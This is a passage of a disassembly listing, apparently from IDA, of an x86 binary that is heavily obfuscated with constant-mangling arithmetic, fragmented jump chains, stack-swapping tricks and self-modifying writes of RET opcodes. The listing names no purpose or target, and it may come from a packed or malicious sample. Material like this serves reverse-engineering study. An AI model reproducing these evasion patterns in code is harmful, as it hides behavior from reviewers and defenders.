; ---------------------------------------------------------------------------
		push	6EA88C25h
		pop	eax
		rol	eax, 0Eh
		sub	eax, ds:4000EDh
		add	eax, 6ECED5BCh
		or	eax, 66D94B72h
		add	eax, 7A5A54F4h
		call	sub_4553CC
		jmp	loc_4424CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44FC3B:				; CODE XREF: sub_445124:loc_43DAB8j
		and	dword ptr [eax+24h], 7FFFFFFFh
		lea	eax, [ebp-14h]
		push	eax
		push	0E20904FCh
		xchg	ebp, [esp+0]
		mov	eax, ebp
		pop	ebp
		jmp	loc_4576E4
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44FC56:				; CODE XREF: sub_4424CF+1638Fj
		jle	loc_44E4BC

loc_44FC5C:				; CODE XREF: sub_45A4C1:loc_43CB15j
		push	17CF876Ch
		pop	ecx
		sub	ecx, ds:4000F3h
		xor	ecx, 69B7134h
		jns	loc_44F10E

loc_44FC74:				; CODE XREF: sub_44CAB1+15j
		jmp	loc_43E665
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_44FC79:				; CODE XREF: sub_446258-8D8Aj
		jmp	loc_44A80D
; END OF FUNCTION CHUNK	FOR sub_446258
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_486. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_44FC7F:				; CODE XREF: sub_448A7D:loc_44BFAAj
		add	edx, 0EB3A0C30h
		test	edx, 80h
		jmp	loc_444F9F
; END OF FUNCTION CHUNK	FOR sub_448A7D
; ---------------------------------------------------------------------------

loc_44FC90:				; CODE XREF: k2vbe3.d:00446A1Dj
		xor	ecx, eax
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44FC92:				; CODE XREF: sub_4580DF:loc_446A01j
		rol	edi, 12h
		test	edi, 4
		jmp	loc_457505
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448E56

loc_44FCA0:				; CODE XREF: sub_448E56:loc_45ADA4j
		push	offset sub_44E39D
		jmp	nullsub_396
; END OF FUNCTION CHUNK	FOR sub_448E56
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_44FCAA:				; CODE XREF: sub_443F0D+91FAj
		pop	edx
		add	edx, 2D9EFDB8h
		sub	edx, 3CECBA18h
		test	edx, 400000h
		jmp	loc_4554FB
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------

loc_44FCC2:				; CODE XREF: k2vbe3.d:00457014j
		shl	esi, 0Ch

loc_44FCC5:				; CODE XREF: k2vbe3.d:00457007j
		add	edx, 359B1A64h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_43D4D3
		jmp	loc_452A48
; ---------------------------------------------------------------------------
		jns	loc_448347
		jmp	sub_441E66
; ---------------------------------------------------------------------------

loc_44FCE5:				; DATA XREF: sub_43D786+15F7Bo
		xchg	ebx, [esp]
		jmp	sub_454E83
; ---------------------------------------------------------------------------

loc_44FCED:				; CODE XREF: k2vbe3.d:0043E62Ej
		xor	ebx, ebp
		jg	loc_453A9C
		jmp	loc_44445E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_44FCFA:				; CODE XREF: sub_452DD6:loc_44F5B8j
					; sub_457D4B-876Cj
		add	ecx, 4F2B87BAh
		add	ecx, ebp
		add	ecx, 43BB7CB0h
		call	sub_459EB0
; END OF FUNCTION CHUNK	FOR sub_457D4B

; =============== S U B	R O U T	I N E =======================================



sub_44FD0D	proc near		; CODE XREF: sub_442F31:loc_44C17Ap
					; k2vbe3.d:00454810j
		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [ebp-0Ch]
		mov	esp, ebp
		pop	ebp
		retn
sub_44FD0D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_44FD18:				; CODE XREF: sub_4524D2-9ACBj
					; sub_4524D2:loc_454DBAj
		inc	dword ptr [ebp-18h]
		dec	dword ptr [ebp-1Ch]
		jmp	loc_443432
; END OF FUNCTION CHUNK	FOR sub_4524D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_44FD23:				; CODE XREF: sub_444966:loc_45538Bj
		push	eax
		pushf
		push	0C4AEAA33h
		pop	eax
		or	eax, 0C5EE9D0Ch
		jmp	loc_445EAB
; END OF FUNCTION CHUNK	FOR sub_444966
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	ebx
		push	875888C2h
		pop	ebx
		add	ebx, 4AADC244h
		or	ebx, 275DACEFh
		jmp	loc_447428
; ---------------------------------------------------------------------------

loc_44FD4F:				; CODE XREF: k2vbe3.d:loc_444D94j
		xchg	esi, [ebp+0]
		xor	esi, 5F91099Eh
		shr	edx, 0Eh
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_44FD5B:				; CODE XREF: sub_44D2F1+131Bj
		jmp	loc_450427
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CDF

loc_44FD60:				; CODE XREF: sub_456CDF+Aj
		mov	eax, [eax]
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		jmp	loc_43CC9D
; END OF FUNCTION CHUNK	FOR sub_456CDF
; ---------------------------------------------------------------------------

loc_44FD6D:				; CODE XREF: k2vbe3.d:00456E18j
		add	eax, 0C771FFD2h

loc_44FD73:				; CODE XREF: k2vbe3.d:loc_455BA8j
		add	ebx, 47454954h
		and	ebx, 3C901810h
		add	ebx, 0CC31E014h
		mov	[ebx], eax
		pop	ebx
		lea	eax, loc_45188B
		mov	byte ptr [eax],	0C3h
		jmp	loc_45188B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44FD96:				; CODE XREF: sub_44B999-29F8j
		jz	loc_43FBF4
		jmp	loc_442F02
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458658

loc_44FDA1:				; CODE XREF: sub_458658:loc_43F9E4j
		jmp	ds:off_41E158
; END OF FUNCTION CHUNK	FOR sub_458658
; ---------------------------------------------------------------------------
		jmp	loc_43F82E

; =============== S U B	R O U T	I N E =======================================



sub_44FDAC	proc near		; CODE XREF: sub_45544E+Dj
					; k2vbe3.d:00458324j ...

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00447D04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457E0E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00458F85 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045B1E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C1CE SIZE 0000000C BYTES

		jno	loc_45C1CE
		pop	edx
		mov	eax, [esp-4+arg_0]

loc_44FDB6:				; CODE XREF: sub_44B94B:loc_440E48j
		push	ebx
		jmp	loc_457E0E
sub_44FDAC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44FDBC:				; CODE XREF: sub_44C90E:loc_44561Cj
		xchg	esi, [esp+0]
		mov	eax, [ebp+8]

loc_44FDC2:				; CODE XREF: sub_44469A:loc_441CA8j
		push	eax
		call	sub_43CC89
		push	2F8AFAC2h
		pop	eax
		jmp	loc_43FC09
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_44FDD3:				; CODE XREF: k2vbe3.d:loc_45B487j
		mov	eax, [esp]
		push	edx
		push	esi
		mov	esi, edi
		xchg	esi, [esp]
		push	0E7605A0Fh
		pop	edi
		rol	edi, 14h
		jmp	loc_451D17
; ---------------------------------------------------------------------------
		mov	ds:off_41E030, eax
		lea	eax, sub_4440B5
		push	offset loc_452E77
		jmp	loc_441363
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44FE01:				; CODE XREF: sub_456666:loc_43D8BAj
		rol	ecx, 11h
		test	ecx, 1
		jmp	loc_458F01
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
		jmp	loc_4578F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_44FE14:				; CODE XREF: sub_452092:loc_457E59j
		call	sub_455B0F
		sbb	ecx, 99F0F488h
		jmp	loc_451286
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A5FF

loc_44FE24:				; CODE XREF: sub_45A5FF+14j
		jz	loc_457321
		jmp	loc_44D7E8
; END OF FUNCTION CHUNK	FOR sub_45A5FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_44FE2F:				; CODE XREF: sub_454E83+6695j
		or	esi, 0F9D9FCBCh
		cmp	esi, 0EFADC4D2h
		jmp	loc_45B51E
; END OF FUNCTION CHUNK	FOR sub_454E83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_324. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44FE41:				; CODE XREF: k2vbe3.d:loc_4424CAj
		mov	ds:dword_41E1B8, eax
		lea	eax, nullsub_518
		call	sub_45C391
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_44FE52:				; CODE XREF: k2vbe3.d:0044213Aj
					; sub_4408BD:loc_44CF25j
		jmp	loc_44AAC2
; END OF FUNCTION CHUNK	FOR sub_4408BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A39

loc_44FE57:				; CODE XREF: sub_451A39:loc_4473FAj
					; k2vbe3.d:00447413j
		and	eax, 67920564h
		or	eax, 0FAA2ADF5h
		xor	eax, 4353F6F1h
		add	eax, 426466E0h
		xchg	eax, [esp-4+arg_0]
		jmp	sub_4479A1
; END OF FUNCTION CHUNK	FOR sub_451A39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44FE77:				; CODE XREF: sub_45A323-1009Bj
		ja	loc_44AE52

loc_44FE7D:				; CODE XREF: sub_45A323:loc_440AA3j
		call	sub_44B4E4
		mov	edx, 0A70158B4h
		push	ecx
		push	1C63B972h
		pop	ecx
		jmp	loc_457605
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440E8E

loc_44FE93:				; CODE XREF: sub_440E8E:loc_440E98j
		push	offset loc_45040B
		jmp	loc_443E03
; END OF FUNCTION CHUNK	FOR sub_440E8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_44FE9D:				; CODE XREF: sub_44F20A:loc_43E514j
		and	eax, 2CDF5C93h
		cmp	eax, 0FAB6DC82h
		jmp	loc_441F0D
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44680D

loc_44FEAE:				; CODE XREF: sub_44680D+16j
		pop	edi
		xor	edi, 0B4988A1Dh
		js	loc_443F8A
		and	edx, 3B269C5Dh
		jmp	loc_443F7F
; END OF FUNCTION CHUNK	FOR sub_44680D
; ---------------------------------------------------------------------------
		cmp	eax, [ebp-0Ch]
		jnz	loc_44A38C
		jmp	loc_446531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_44FED4:				; CODE XREF: sub_43D45F:loc_4405D9j
		ror	eax, 6
		mov	edx, [esp-8+arg_4]
		push	ebx
		mov	ebx, eax
		push	offset loc_4494CF
		jmp	loc_448322
; END OF FUNCTION CHUNK	FOR sub_43D45F
; ---------------------------------------------------------------------------

loc_44FEE7:				; CODE XREF: k2vbe3.d:0043CDE3j
		jbe	loc_43FA85
		or	ebx, 0DE2DF149h

; =============== S U B	R O U T	I N E =======================================



sub_44FEF3	proc near		; CODE XREF: sub_445124+92CFp

; FUNCTION CHUNK AT 00449E6A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DCEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457678 SIZE 00000017 BYTES

		xchg	esi, [esp+0]
		pop	esi
		jmp	loc_457678
sub_44FEF3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599AA

loc_44FEFC:				; CODE XREF: sub_4599AA:loc_457207j
		call	sub_4537C9

loc_44FF01:				; CODE XREF: sub_459DA3-22B8j
		jmp	sub_447DCD
; END OF FUNCTION CHUNK	FOR sub_4599AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C1A

loc_44FF06:				; CODE XREF: sub_448C1A-166Bj
		jmp	loc_446F05
; END OF FUNCTION CHUNK	FOR sub_448C1A
; ---------------------------------------------------------------------------
		cmp	dword ptr [ebp-8], 0
		jz	loc_454D0A
		jmp	loc_457879
; ---------------------------------------------------------------------------

loc_44FF1A:				; CODE XREF: k2vbe3.d:0044B9B2j
		jl	loc_451EED

; =============== S U B	R O U T	I N E =======================================



sub_44FF20	proc near		; CODE XREF: sub_441409+123EAp

; FUNCTION CHUNK AT 00443BCE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004464E2 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044BD3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454B1B SIZE 00000008 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_443A95
		jmp	loc_443BCE
sub_44FF20	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44FF2E:				; CODE XREF: k2vbe3.d:0044ADD1j
		and	eax, 5D270DAFh

; =============== S U B	R O U T	I N E =======================================



sub_44FF34	proc near		; CODE XREF: sub_448834+19C3p

; FUNCTION CHUNK AT 0045031A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004520B0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004552CD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00455637 SIZE 0000000D BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ebx, 72FF74BEh
		call	sub_454E69

loc_44FF43:				; CODE XREF: sub_455BEA+557Ej
		jmp	loc_4552CD
sub_44FF34	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	sub_4508A3
		or	eax, eax
		jnz	loc_43D06C
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44FF55:				; CODE XREF: sub_440C94:loc_44A89Fj
		jmp	loc_45A599
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
		popf
		jmp	loc_453F56
; ---------------------------------------------------------------------------

loc_44FF60:				; CODE XREF: k2vbe3.d:004560D9j
		push	ecx
		push	0BC72C270h
		pop	ecx
		sub	ecx, 0E8E68C58h
		rol	ecx, 9
		jmp	loc_444525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4444EC

loc_44FF75:				; CODE XREF: sub_4444EC+13j
		mov	byte ptr [eax],	0C3h
		jmp	loc_4505B5
; END OF FUNCTION CHUNK	FOR sub_4444EC

; =============== S U B	R O U T	I N E =======================================



sub_44FF7D	proc near		; CODE XREF: sub_406424+27p
					; sub_40E02D+134p ...
		call	sub_44FF97
		jmp	ds:off_41E150
sub_44FF7D	endp

; ---------------------------------------------------------------------------

loc_44FF88:				; CODE XREF: k2vbe3.d:00453662j
		jmp	loc_441BBF
; ---------------------------------------------------------------------------

loc_44FF8D:				; CODE XREF: k2vbe3.d:0043D142j
		jmp	loc_4561F4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446BEB

loc_44FF92:				; CODE XREF: sub_446BEB-AAC0j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_446BEB

; =============== S U B	R O U T	I N E =======================================



sub_44FF97	proc near		; CODE XREF: sub_455D20:loc_44865Bj
					; sub_44DFE5+12j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F5EE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043F971 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441F80 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B839 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044CF7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451209 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452A1A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453AF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004544D1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455D2E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456BBF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459D94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A161 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AFD9 SIZE 00000010 BYTES

		jnz	loc_455D2E
		xchg	edi, [esp+4+var_4]
		push	edi
		pop	edx
		jmp	loc_459D94
sub_44FF97	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44FFA7:				; CODE XREF: sub_45A323:loc_45B417j
		pop	edi
		sub	edi, 0CD2583CCh
		xor	edi, 9C4D2382h
		push	offset sub_44E5C6
		jmp	loc_44EEF9
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44FFBE:				; CODE XREF: sub_440C94+F582j
					; sub_45B454:loc_45A8E5j
		lea	edx, [ebp+var_14]
		mov	eax, offset dword_44BD1C
		call	sub_45B74D
		lea	eax, [ebp+var_14]
		jmp	loc_45021B
; END OF FUNCTION CHUNK	FOR sub_440C94

; =============== S U B	R O U T	I N E =======================================



sub_44FFD3	proc near		; CODE XREF: sub_449774+Ap
					; k2vbe3.d:0045AFFEj
		xchg	ebx, [esp+0]
		pop	ebx
		push	edi
		mov	edi, edx
		xchg	edi, [esp+0]
		call	sub_457B59
		mov	eax, [esp+0]
		call	sub_453347
		retn
sub_44FFD3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_44FFEB:				; CODE XREF: sub_441172:loc_45A768j
		jmp	sub_4436CE
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44FFF0:				; CODE XREF: sub_456666:loc_45666Fj
		jmp	loc_43EAD5
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4412B5

loc_44FFF5:				; CODE XREF: sub_4412B5+Aj
		jmp	nullsub_513
; END OF FUNCTION CHUNK	FOR sub_4412B5
; ---------------------------------------------------------------------------
		dw 0ABABh
dword_44FFFC	dd 0B95515F6h		; DATA XREF: sub_4481FA+29F5w
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441418

loc_450000:				; CODE XREF: sub_441418+E078j
		jmp	loc_44DA08
; END OF FUNCTION CHUNK	FOR sub_441418
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_450005:				; CODE XREF: sub_440C94+D7A3j
		jmp	loc_451DE4
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C1

loc_45000A:				; CODE XREF: sub_45A4C1-1878Dj
		jmp	loc_43CB15
; END OF FUNCTION CHUNK	FOR sub_45A4C1

; =============== S U B	R O U T	I N E =======================================



sub_45000F	proc near		; CODE XREF: sub_4056E7+49p
					; sub_405753+49p ...

; FUNCTION CHUNK AT 004427C9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447C85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B54C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044DD85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E31A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00451643 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045168E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045341A SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00454A02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045721C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458777 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00459E80 SIZE 00000010 BYTES

		jno	loc_459E80
		jmp	loc_447C85
sub_45000F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_45001A:				; CODE XREF: sub_44DB59+D49Ej
		jnz	loc_43EEF9
		or	esi, 0A8A52101h
		jnp	loc_456CCC
		jmp	loc_453FA9
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
		sbb	ebx, 0B58ED744h
		jmp	loc_44FA7C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_45003C:				; CODE XREF: sub_454E69:loc_450B2Bj
		jz	loc_442491
		jmp	loc_44818E
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
		jnz	loc_44DBF7
		cdq
		jmp	sub_457A23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_450053:				; CODE XREF: sub_451CF1:loc_4548D5j
		jz	loc_442EEE
		test	ebx, 0CC95F86Dh
		jmp	loc_444111
; END OF FUNCTION CHUNK	FOR sub_451CF1

; =============== S U B	R O U T	I N E =======================================



sub_450064	proc near		; DATA XREF: k2vbe3.d:0044A9AEo
		add	eax, 5DF20912h
		add	eax, ebp
		add	eax, 0A431F627h
		call	sub_4478F3
sub_450064	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45BB88

loc_450077:				; CODE XREF: sub_45BB88+9j
		jmp	loc_44A3A9
; END OF FUNCTION CHUNK	FOR sub_45BB88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44693E

loc_45007C:				; CODE XREF: sub_44693E+10j
		jmp	nullsub_517
; END OF FUNCTION CHUNK	FOR sub_44693E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_383. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_450082:				; CODE XREF: sub_44C90E+D6E9j
		jz	loc_443220
		jmp	loc_44EE55
; ---------------------------------------------------------------------------

loc_45008D:				; CODE XREF: sub_44C90E:loc_450C4Ej
		add	edi, 83072DF6h
		and	edi, 85131547h
		add	edi, 80332E8Eh
		mov	[edi], eax
		pop	edi
; END OF FUNCTION CHUNK	FOR sub_44C90E
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_4500A2:				; CODE XREF: sub_43DEBE:loc_44E77Ej
					; sub_43DEBE+153C8j
		ror	eax, 10h
		push	esi
		push	95A0D93Dh
		jmp	loc_44B705
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_4500B0:				; CODE XREF: sub_449372:loc_443860j
		jnz	loc_45A314
		jmp	loc_43E238
; END OF FUNCTION CHUNK	FOR sub_449372

; =============== S U B	R O U T	I N E =======================================



sub_4500BB	proc near		; CODE XREF: sub_450B1E+2p
					; k2vbe3.d:00457155j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F27E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E5A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00447362 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044F07C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045AEDD SIZE 00000026 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ecx, [esp+0]

loc_4500C2:				; CODE XREF: sub_43E470:loc_455573j
		mov	ebp, esp
		push	ebp
		push	ecx
		pop	ebp
		xchg	ebp, [esp+0]
		jmp	loc_447362
sub_4500BB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4500CF:				; CODE XREF: k2vbe3.d:00446C7Bj
		sub	ecx, 0A580A207h
		jmp	loc_456832
; ---------------------------------------------------------------------------
		js	loc_4530C1
		jmp	loc_44B6E7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_477. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_4500E6:				; CODE XREF: sub_4424CF:loc_44CA0Aj
		add	edx, ebp
		cdq
		jmp	loc_458858
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_4500EE:				; CODE XREF: sub_448D7F+1136Cj
		jnz	loc_456C0D
		jz	loc_458843
		and	edi, ebx
; END OF FUNCTION CHUNK	FOR sub_448D7F
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4500FC:				; CODE XREF: sub_447E07:loc_44F54Cj
		push	0A65DFD6Bh
		pop	eax
		rol	eax, 13h
		sub	eax, 0FB9F442Eh
		add	eax, 9253FAC3h
		jmp	loc_459FA1
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_450116:				; CODE XREF: sub_4443DD:loc_450EC6j
		add	edx, 57C79BBCh
		mov	[edx], eax
		pop	edx
		push	offset loc_43E529
		jmp	loc_44A00F
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_45AD21
		jmp	loc_445119
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_450136:				; CODE XREF: sub_43F7AC+193ABj
		sub	esi, 22B49AD3h
		add	esi, 3768FDA4h
		call	sub_44E2C0
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_450147:				; CODE XREF: sub_45A323:loc_441072j
		adc	edx, eax
		jnp	loc_4478DA
		jmp	loc_442886
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_450154:				; CODE XREF: sub_4517D6-11F65j
					; sub_44ED3C-23B7j
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_450158	proc near		; CODE XREF: sub_447585p
		call	sub_45A5D9

loc_45015D:				; CODE XREF: sub_44FA2A+Cj
		push	eax
		pop	ebp
		call	sub_457DCA

loc_450164:				; CODE XREF: k2vbe3.d:0044765Fj
					; k2vbe3.d:loc_448461j
		jmp	sub_457F1C
sub_450158	endp

; ---------------------------------------------------------------------------
		mov	esi, edx
		jmp	sub_45756B
; ---------------------------------------------------------------------------

loc_450170:				; DATA XREF: sub_43FDA2:loc_43FDB7o
		or	eax, eax
		jz	loc_452242
		jmp	loc_44BE34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_45017D:				; CODE XREF: sub_4467A1+EF14j
		jnz	loc_443053

loc_450183:				; CODE XREF: sub_45A323-47B4j
		jmp	loc_453A2B
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------

loc_450188:				; CODE XREF: k2vbe3.d:0043F069j
		jmp	loc_459255
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518D8

loc_45018D:				; CODE XREF: sub_4518D8-14B12j
		jmp	nullsub_392
; END OF FUNCTION CHUNK	FOR sub_4518D8
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_44304D
; ---------------------------------------------------------------------------

loc_450198:				; DATA XREF: sub_4423D2+1277Ao
		call	sub_4414DA
		add	ebx, eax
		mov	eax, ds:dword_441774
		mov	[eax], ebx
		push	0F1DDD254h
		jmp	loc_455CCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_4501B0:				; CODE XREF: sub_45530F-5E5Bj
		xchg	edx, [esi]
		shr	esi, 0Eh
		jmp	loc_45886D
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_4501BA:				; CODE XREF: sub_44B979-567Ej
		call	sub_44B912
; END OF FUNCTION CHUNK	FOR sub_44B979
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_4501BF:				; CODE XREF: sub_443A30:loc_449171j
		pop	eax
		pop	edx
		pop	ebx
		xchg	edx, [esp-0Ch+arg_8]
		mov	ecx, edx
		jmp	loc_44F8DC
; END OF FUNCTION CHUNK	FOR sub_443A30

; =============== S U B	R O U T	I N E =======================================



sub_4501CC	proc near		; CODE XREF: k2vbe3.d:00456A1Aj
					; sub_45A323:loc_45A345p

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [ebp+8]
		call	sub_43CD32

loc_4501D8:				; CODE XREF: sub_44E2A4:loc_4412EDj
					; k2vbe3.d:00453272j
		add	edi, 0EA27ECDAh
		mov	[edi], eax
		xchg	esi, [esp-4+arg_0]
		mov	edi, esi
